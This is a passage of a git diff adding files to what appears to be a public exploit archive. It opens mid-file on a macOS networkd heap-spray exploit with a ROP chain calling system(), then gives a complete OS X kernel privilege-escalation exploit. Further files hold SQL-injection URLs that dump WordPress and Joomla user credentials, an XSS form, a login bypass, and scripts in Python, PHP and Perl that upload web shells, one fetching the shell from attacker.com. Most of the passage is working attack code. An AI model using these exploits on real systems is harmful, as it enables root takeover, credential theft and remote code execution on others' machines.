+  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+    xpc_type_t t = xpc_get_type(event);
+    if (t == XPC_TYPE_ERROR){
+      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+    }
+    printf("received an event\n");
+  });
+  xpc_connection_resume(conn);
+  return conn;
+}
+
+void go(){
+  void* heap_spray_target_addr = (void*)0x120202000;
+  struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
+  memset(hs, 'C', 0x1000);
+  hs->null0 = 0;
+  hs->fake_objc_class_ptr = &hs->fake_objc_class;
+  hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
+  hs->fake_objc_class.cache_bucket_mask = 0;
+
+  // nasty hack to find the correct selector address :)
+  uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
+  uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector 
+  uint64_t sel = msgrefs[1];
+  printf("%p\n", sel);
+  hs->fake_cache_bucket.cached_sel = sel;
+
+  uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
+  // pivot:
+/*
+push rax
+add eax, [rax]
+add [rbx+0x41], bl
+pop rsp
+pop r14
+pop r15
+pop rbp
+ret
+*/
+  hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
+
+  // jump over the NULL then so there's more space:
+  //pop, pop, pop, ret: //and keep stack correctly aligned
+  hs->first_gadget = CoreFoundation_base + 0x46ef7;
+
+  hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
+  hs->system = dlsym(RTLD_DEFAULT, "system");
+
+  hs->rdi = &hs->command;
+  strcpy(hs->command, "touch /tmp/hello_networkd");
+
+
+  size_t heap_spray_pages = 0x40000;
+  size_t heap_spray_bytes = heap_spray_pages * 0x1000;
+  char* heap_spray_copies = malloc(heap_spray_bytes);
+  for (int i = 0; i < heap_spray_pages; i++){
+    memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
+  }
+
+  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
+
+  xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
+
+  xpc_dictionary_set_uint64(msg, "type", 6);
+  xpc_dictionary_set_uint64(msg, "connection_id", 1);
+
+  xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
+  xpc_object_t conn_list = xpc_array_create(NULL, 0);
+  
+  xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
+  xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
+
+  xpc_array_append_value(conn_list, arr_dict);
+  xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
+  
+  char* long_key = malloc(1024);
+  memset(long_key, 'A', 1023);
+  long_key[1023] = '\x00';
+
+  xpc_dictionary_set_string(params, long_key, "something or other that's not important");
+
+  uint64_t uuid[] = {0, 0x120200000};
+  xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
+  xpc_dictionary_set_uint64(params, "start", 0);
+  xpc_dictionary_set_uint64(params, "duration", 0);
+  
+  xpc_dictionary_set_value(msg, "parameters", params);
+
+  xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
+  xpc_dictionary_set_int64(state, "power_slot", 0);
+  xpc_dictionary_set_value(msg, "state", state);
+
+  xpc_object_t conn = connect();
+  printf("connected\n");
+
+  xpc_connection_send_message(conn, msg);
+  printf("enqueued message\n");
+
+  xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
+
+  xpc_release(msg);
+}
+
+int main(){
+  go();
+  printf("entering CFRunLoop\n");
+  for(;;){
+    CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
+  }
+  
+  return 0;
+}
diff --git a/platforms/osx/local/35848.c b/platforms/osx/local/35848.c
new file mode 100755
index 000000000..413530788
--- /dev/null
+++ b/platforms/osx/local/35848.c
@@ -0,0 +1,323 @@
+// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
+// ianbeer
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <unistd.h>
+
+#include <CoreFoundation/CoreFoundation.h>
+#include <IOKit/IOKitLib.h>
+
+uint64_t kernel_symbol(char* sym){
+  char cmd[1024];
+  strcpy(cmd, "nm -g /mach_kernel | grep ");
+  strcat(cmd, sym);
+  strcat(cmd, " | cut -d' ' -f1");
+  FILE* f = popen(cmd, "r");
+  char offset_str[17];
+  fread(offset_str, 16, 1, f);
+  pclose(f);  
+  offset_str[16] = '\x00';
+
+  uint64_t offset = strtoull(offset_str, NULL, 16);
+  return offset;
+}
+
+uint64_t leaked_offset_in_kext(){
+  FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
+  char offset_str[17];
+  fread(offset_str, 16, 1, f);
+  pclose(f);  
+  offset_str[16] = '\x00';
+
+  uint64_t offset = strtoull(offset_str, NULL, 16);
+  offset += 0x10; //offset from symbol to leaked pointer
+  return offset;
+}
+
+
+uint64_t leak(){
+  io_iterator_t iter;
+  
+  CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
+                                               kIOServicePlane,
+                                               CFSTR("AAPL,iokit-ndrv"),
+                                               kCFAllocatorDefault,
+                                               kIORegistryIterateRecursively);
+
+  if (CFGetTypeID(p) != CFDataGetTypeID()){
+    printf("expected CFData\n");
+    return 1;
+  }
+
+  if (CFDataGetLength(p) != 8){
+    printf("expected 8 bytes\n");
+    return 1;
+  }
+
+  uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
+  return leaked;
+}
+
+extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
+
+uint64_t kext_load_addr(char* target_name){
+  uint64_t addr = 0;
+  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
+  CFIndex count = CFDictionaryGetCount(kd);
+  
+  void **keys;
+  void **values;
+  
+  keys = (void **)malloc(sizeof(void *) * count);
+  values = (void **)malloc(sizeof(void *) * count);
+  
+  CFDictionaryGetKeysAndValues(kd,
+                               (const void **)keys,
+                               (const void **)values);
+
+  for(CFIndex i = 0; i < count; i++){
+    const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
+    if (strcmp(name, target_name) == 0){
+      CFNumberGetValue(CFDictionaryGetValue(values[i],
+                       CFSTR("OSBundleLoadAddress")),
+                       kCFNumberSInt64Type,
+                       &addr);
+      printf("%s: 0x%016llx\n", name, addr);
+      break;
+    }
+  }
+  return addr;
+
+}
+
+uint64_t load_addr(){
+  uint64_t addr = 0;
+  CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
+  CFIndex count = CFDictionaryGetCount(kd);
+  
+  void **keys;
+  void **values;
+  
+  keys = (void **)malloc(sizeof(void *) * count);
+  values = (void **)malloc(sizeof(void *) * count);
+  
+  CFDictionaryGetKeysAndValues(kd,
+                               (const void **)keys,
+                               (const void **)values);
+
+  for(CFIndex i = 0; i < count; i++){
+    const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
+    if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
+      CFNumberGetValue(CFDictionaryGetValue(values[i],
+                       CFSTR("OSBundleLoadAddress")),
+                       kCFNumberSInt64Type,
+                       &addr);
+      printf("%s: 0x%016llx\n", name, addr);
+      break;
+    }
+  }
+  return addr;
+}
+
+uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
+  uint64_t kernel_base = 0xffffff8000200000;
+  kernel_base += kaslr_slide;
+    
+  int fd = open("/mach_kernel", O_RDONLY);
+  if (!fd)
+    return NULL;
+
+  struct stat _stat;
+  fstat(fd, &_stat);
+  size_t buf_len = _stat.st_size;
+
+  uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
+
+  if (!buf)
+    return NULL;
+
+  /*
+  this stack pivot to rax seems to be reliably present across mavericks versions:
+    push rax
+    add [rax], eax
+    add [rbx+0x41], bl
+    pop rsp
+    pop r14
+    pop r15
+    pop rbp
+    ret
+  */
+  uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
+  uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
+  uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
+  printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
+  uint64_t pivot = kernel_base + pivot_gadget_offset;
+
+  /*
+    pop rdi
+    ret
+  */
+  uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
+  uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
+  uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
+  printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
+  uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
+  
+  /*
+    pop rsi
+    ret
+  */
+  uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
+  uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
+  uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
+  printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
+  uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
+  
+  /*
+    pop rdx
+    ret
+  */
+  uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
+  uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
+  uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
+  printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
+  uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
+
+  munmap(buf, buf_len);
+  close(fd);
+
+
+  /*
+    in IOAcceleratorFamily2
+    two locks are held - r12 survives the pivot, this should unlock all the locks from there:
+__text:0000000000006F80                 lea     rsi, unk_32223
+__text:0000000000006F87                 mov     rbx, [r12+118h]
+__text:0000000000006F8F                 mov     rax, [rbx]
+__text:0000000000006F92                 mov     rdi, rbx
+__text:0000000000006F95                 xor     edx, edx
+__text:0000000000006F97                 call    qword ptr [rax+858h]
+__text:0000000000006F9D                 mov     rdi, rbx        ; this
+__text:0000000000006FA0                 call    __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
+__text:0000000000006FA5                 mov     rdi, [rbx+88h]
+__text:0000000000006FAC                 call    _IOLockUnlock
+__text:0000000000006FB1
+__text:0000000000006FB1 loc_6FB1:                               ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
+__text:0000000000006FB1                 xor     ecx, ecx
+__text:0000000000006FB3                 jmp     loc_68BC 
+...
+__text:00000000000068BC                 mov     eax, ecx        ; jumptable 00000000000067F1 default case
+__text:00000000000068BE                 add     rsp, 38h
+__text:00000000000068C2                 pop     rbx
+__text:00000000000068C3                 pop     r12
+__text:00000000000068C5                 pop     r13
+__text:00000000000068C7                 pop     r14
+__text:00000000000068C9                 pop     r15
+__text:00000000000068CB                 pop     rbp
+__text:00000000000068CC                 retn
+  */
+  uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
+
+  printf("0x%016llx\n", unlock_locks);
+
+  uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
+  uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
+  
+  //char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
+  char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
+
+  uint64_t rop_stack[] = {
+    0,                //pop r14
+    0,                //pop r15  
+    0,                //pop rbp  +10
+    unlock_locks,
+    pivot,            //+20  virtual call is rax+20
+    0, //+10
+    0, //+18
+    0,
+    0, //+28
+    0, 
+    0, //+38
+    0, //pop rbx
+    0, //pop r12
+    0, //pop r13
+    0, //pop r14
+    0, //pop r15
+    0, //pop rbp
+    pop_rdi_ret,
+    (uint64_t)payload,
+    pop_rsi_ret,
+    0,
+    pop_rdx_ret,
+    0,
+    KUNCExecute,
+    thread_exception_return
+  };
+
+  uint64_t* r = malloc(sizeof(rop_stack));
+  memcpy(r, rop_stack, sizeof(rop_stack));
+  *len = sizeof(rop_stack);
+  return r;
+}
+
+void trigger(void* vtable, size_t vtable_len){
+  //need to overallocate and touch the pages since this will be the stack:
+  mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
+  mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
+
+  memset(addr, 0, 0x20*0x1000);
+  memcpy((void*)0x41420000, vtable, vtable_len);
+
+  //map NULL page
+  vm_deallocate(mach_task_self(), 0x0, 0x1000);
+  addr = 0;
+  vm_allocate(mach_task_self(), &addr, 0x1000, 0);
+  char* np = 0;
+  for (int i = 0; i < 0x1000; i++){
+    np[i] = 'A';
+  }
+
+  volatile uint64_t* zero = 0;
+  *zero = 0x41420000;
+
+  //trigger vuln
+  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
+  io_iterator_t iterator;
+  kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
+  
+  io_service_t service = IOIteratorNext(iterator);
+  io_connect_t conn = MACH_PORT_NULL;
+  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
+
+  addr = 0x12345000;
+  mach_vm_size_t size = 0x1000;
+
+  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
+}
+
+int main() {
+  uint64_t leaked_ptr = leak();
+  uint64_t kext_load_addr = load_addr();
+
+  // get the offset of that pointer in the kext:
+  uint64_t offset = leaked_offset_in_kext();
+
+  // sanity check the leaked address against the symbol addr:
+  if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
+    printf("the leaked pointer doesn't match up with the expected symbol offset\n");
+    return 1;
+  }
+  
+  uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
+  
+  printf("kaslr slide: %p\n", kaslr_slide);
+
+  size_t vtable_len = 0;
+  void* vtable = build_vtable(kaslr_slide, &vtable_len);
+
+  trigger(vtable, vtable_len);
+
+  return 0;                            
+}
diff --git a/platforms/php/remote/35855.txt b/platforms/php/remote/35855.txt
new file mode 100755
index 000000000..d8b11b563
--- /dev/null
+++ b/platforms/php/remote/35855.txt
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/48259/info
+
+PHP is prone to a security-bypass vulnerability.
+
+Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
+
+PHP 5.3.6 is vulnerable; other versions may also be affected.
+
+HTTP Request:
+====
+POST /file-upload-fuzz/recv_dump.php HTTP/1.0
+host: blog.security.localhost
+content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
+content-length: 200
+
+------------ThIs_Is_tHe_bouNdaRY_$
+Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
+Content-Type: text/plain
+
+any
+------------ThIs_Is_tHe_bouNdaRY_$--
+
+HTTP Response:
+====
+HTTP/1.1 200 OK
+Date: Fri, 27 May 2011 11:35:08 GMT
+Server: Apache/2.2.14 (Ubuntu)
+X-Powered-By: PHP/5.3.2-1ubuntu4.9
+Content-Length: 30
+Connection: close
+Content-Type: text/html
+
+/anything.here.slash-will-pass
+
+PHP script:
+=====
+<?php
+if (!empty($_FILES['contents'])) {  // process file upload
+    echo $_FILES['contents']['name'];
+    unlink($_FILES['contents']['tmp_name']);
+}
diff --git a/platforms/php/webapps/35835.txt b/platforms/php/webapps/35835.txt
new file mode 100755
index 000000000..4ab50dd51
--- /dev/null
+++ b/platforms/php/webapps/35835.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/48166/info
+
+The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
+ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
\ No newline at end of file
diff --git a/platforms/php/webapps/35837.html b/platforms/php/webapps/35837.html
new file mode 100755
index 000000000..c07c95bc5
--- /dev/null
+++ b/platforms/php/webapps/35837.html
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/48215/info
+
+
+The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected. 
+
+<html>
+<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
+<body bgcolor="#1C1C1C">
+<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
+<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
+<input type="hidden" name="url" value="1" />
+<input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; />
+<input type="hidden" name="button" value="Send%20Details" />
+</form>
+<a href="javascript: xss1();" style="text-decoration:none">
+<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
+</body>
+</html>
diff --git a/platforms/php/webapps/35838.txt b/platforms/php/webapps/35838.txt
new file mode 100755
index 000000000..331aecf6a
--- /dev/null
+++ b/platforms/php/webapps/35838.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/48217/info
+
+Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?tip=art&id=2' <- blind sql 
\ No newline at end of file
diff --git a/platforms/php/webapps/35839.txt b/platforms/php/webapps/35839.txt
new file mode 100755
index 000000000..d74a5d2d4
--- /dev/null
+++ b/platforms/php/webapps/35839.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48223/info
+
+Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/35840.txt b/platforms/php/webapps/35840.txt
new file mode 100755
index 000000000..829161a71
--- /dev/null
+++ b/platforms/php/webapps/35840.txt
@@ -0,0 +1,62 @@
+???# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
+# Date: 11-05-2014
+# Exploit Author: shyamkumar somana
+# Vendor Homepage: http://redaxscript.com/
+# Version: 2.1.0
+# Tested on: Windows 8
+
+#Privilege Escalation in RedaxScript 2.1.0
+
+
+ RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
+issue occurs because the application fails to properly implement access
+controls. The application also fails to perform proper sanity checks on the
+user supplied input before processing it.  These two flaws led to a
+vertical privilege escalation. This can be achieved by a simply tampering
+the parameter values. An attacker can exploit this issue to gain elevated
+privileges to the application.
+
+*Steps to reproduce the instance:*
+
+·         login as a non admin user
+
+·         Go to account and update the account.
+
+·         intercept the request and add “*groups[]=1*” to the post data and
+submit the request
+
+·         Log out of the application and log in again. You can now browse
+the application with admin privileges.
+
+This vulnerability was addressed in the following commit.
+
+https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
+
+
+*Timeline*:
+
+09-26-2014:         Issue identified
+
+09-27-2014:         Discussion with the vendor
+
+10-27-2014:         Issue confirmed
+
+11-05-2014:         Patch released.
+
+
+
+
+Author:                                Shyamkumar Somana
+Vendor Homepage:        http://redaxscript.com/download
+Version:                               2.1.0
+Tested on:                          Windows 7
+
+-- 
+
+  [image: --]
+shyam kumar
+[image: http://]about.me/shyamkumar.somana
+     <http://about.me/shyamkumar.somana?promo=email_sig>
+
+Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
+in.linkedin.com/in/sshyamkumar/ |
diff --git a/platforms/php/webapps/35846.txt b/platforms/php/webapps/35846.txt
new file mode 100755
index 000000000..f2c26e53d
--- /dev/null
+++ b/platforms/php/webapps/35846.txt
@@ -0,0 +1,118 @@
+Mogwai Security Advisory MSA-2015-01
+----------------------------------------------------------------------
+Title:              WP Pixarbay Images Multiple Vulnerabilities
+Product:            Pixarbay Images (Wordpress Plugin)
+Affected versions:  2.3
+Impact:             high
+Remote:             yes
+Product link:       https://wordpress.org/plugins/pixabay-images/
+Reported:           14/01/2015
+by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
+
+
+Vendor's Description of the Software:
+----------------------------------------------------------------------
+Pixabay Images is a WordPress plugin that let's you pick CC0 public 
+domain pictures from Pixabay and insert them with just a click anywhere 
+on your blog. The images are safe to use, and paying attribution or 
+linking back to the source is not required.
+
+
+Business recommendation:
+----------------------------------------------------------------------
+Update to version 2.4
+
+Vulnerability description:
+----------------------------------------------------------------------
+1) Authentication bypass
+The plugin does not correctly check if the user is logged in. Certain
+code can be called without authentication
+
+2) Arbitrary file upload
+The plugin code does not validate the host in the provided download URL,
+which allows to upload malicious files, including PHP code.
+
+3) Path Traversal
+Certain values are not sanitized before they are used in a file operation.
+This allows to store files outside of the "download" folder. 
+
+4) Cross Site Scripting (XSS)
+The generated author link uses unsanitized user values which can be
+abused for Cross Site Scripting (XSS) attacks. 
+
+
+Proof of concept:
+----------------------------------------------------------------------
+The following PoC Python script can be used to download PHP files from
+a attacker controlled host.
+
+#!/usr/bin/env python
+
+import argparse
+import httplib, urllib
+from urlparse import urlparse
+
+def exploit(target_url, shellcode_url):
+
+target = urlparse(target_url)
+
+params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
+'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
+headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
+
+print "[+] Sending download request...."
+conn = httplib.HTTPConnection(target.netloc)
+conn.request("POST", target.path + "/wp-admin/", params, headers)
+
+response = conn.getresponse()
+response_data = response.read()
+if response.status != 200 and response_data != "Error: File attachment metadata
+error":
+print "[-] Something went wrong"
+print response_data
+exit()
+
+conn.close()
+
+
+# ---- Main code ----------------
+parser = argparse.ArgumentParser()
+parser.add_argument("target_url", help="The target url, for example
+http://foo.bar/blog/")
+parser.add_argument("shellcode_url", help="The url of the PHP file that should
+be uploaded, for example: http://attacker.com/shell.php")
+
+print "----------------------------------------------"
+print " pixabay upload wordpress plugin exploit PoC"
+print " Mogwai security"
+print "----------------------------------------------"
+
+arguments = parser.parse_args()
+exploit(arguments.target_url, arguments.shellcode_url)
+
+
+
+
+Vulnerable / tested versions:
+----------------------------------------------------------------------
+Pixabay Images 2.3
+
+
+Disclosure timeline:
+----------------------------------------------------------------------
+14/01/2014: Reporting issues to the plugin author
+15/01/2014: Release of fixed version (2.4)
+19/01/2014: Public advisory
+
+
+Advisory URL:
+----------------------------------------------------------------------
+https://www.mogwaisecurity.de/#lab
+
+
+----------------------------------------------------------------------
+Mogwai, IT-Sicherheitsberatung Muench
+Steinhoevelstrasse 2/2
+89075 Ulm (Germany)
+
+info@mogwaisecurity.de
\ No newline at end of file
diff --git a/platforms/php/webapps/35851.txt b/platforms/php/webapps/35851.txt
new file mode 100755
index 000000000..6c441e47a
--- /dev/null
+++ b/platforms/php/webapps/35851.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/48233/info
+
+WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+WebFileExplorer 3.6 is vulnerable; other versions may also be affected. 
+
+Supplying the following input to the username or password field is sufficient to exploit these issues:
+
+user: admin' or '1=1
+pass: anything 
\ No newline at end of file
diff --git a/platforms/php/webapps/35853.php b/platforms/php/webapps/35853.php
new file mode 100755
index 000000000..e24adabaa
--- /dev/null
+++ b/platforms/php/webapps/35853.php
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/48257/info
+
+Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+
+Phpnuke 8.3 is vulnerable; other versions may also be affected. 
+
+<?php
+///////////////////////////////////////////////////
+#Iranian Pentesters Home
+#PHP Nuke 8.3 MT AFU Vulnerability
+#Coded by:4n0nym0us & b3hz4d
+#http://www.pentesters.ir
+///////////////////////////////////////////////////
+//Settings:
+$address = 'http://your-target.com';
+$file = 'shell.php.01';
+$prefix='pentesters_';
+
+
+//Exploit:
+@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
+@$file_data .= file_get_contents($file);
+file_put_contents($prefix . $file, $file_data);
+$file = $prefix . $file;
+echo "\n" . "///////////////////////////////////" ."\n";
+echo "     Iranian Pentesters Home" . "\n";
+echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
+echo "///////////////////////////////////" ."\n";
+$address_c = $address . '/includes/richedit/upload.php';
+$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
+$data =  post_data($address_c, $postdata);
+$start = strpos($data, "<img src=\"upload");
+if ($start != null)
+{
+$data = substr($data,$start + 10);
+$end = strpos($data, "\"");
+$data = substr($data,0,$end);
+echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
+}
+else
+echo "\n" . "Upload Failed!!!";
+function post_data($address, $data)
+{
+    $curl = curl_init($address);
+    curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
+    curl_setopt($curl, CURLOPT_POST, 1);
+    curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
+    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
+    $content = curl_exec($curl);
+    curl_close($curl);
+    return $content;
+}
+?>
+
diff --git a/platforms/php/webapps/35854.pl b/platforms/php/webapps/35854.pl
new file mode 100755
index 000000000..2df7d63b9
--- /dev/null
+++ b/platforms/php/webapps/35854.pl
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/48257/info
+ 
+Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+ 
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+ 
+Phpnuke 8.3 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+###################################################
+#//Iranian Pentesters Home
+#//PHP Nuke 8.3 MT AFU Vulnerability
+#//Coded by:4n0nym0us & b3hz4d
+#//http://www.pentesters.ir
+###################################################
+
+
+use LWP;
+use HTTP::Request::Common;
+print "\n" . "///////////////////////////////////" ."\n";
+print "     Iranian Pentesters Home" . "\n";
+print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
+print "///////////////////////////////////" ."\n";
+print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";
+my $url   = $ARGV[0]."/includes/richedit/upload.php";
+my $filename = $ARGV[1];
+my $prefix = $ARGV[2];
+my $rfile = $prefix . $filename . ".gif";
+open fhandle, $ARGV[1] or die $!; 
+while (<fhandle>){
+$shell .= $_;
+}
+close fhandle;
+open fhandle, ">", $rfile or die $!;
+print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
+close(fhandle);
+my $ua = LWP::UserAgent->new;
+$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
+my $req = POST $url, Content_Type => 'form-data',
+	Content      => [
+		upload => "1",
+		path => 'images',
+		pwd => "1",
+		userfile =>  [ $rfile,$prefix . $filename ]
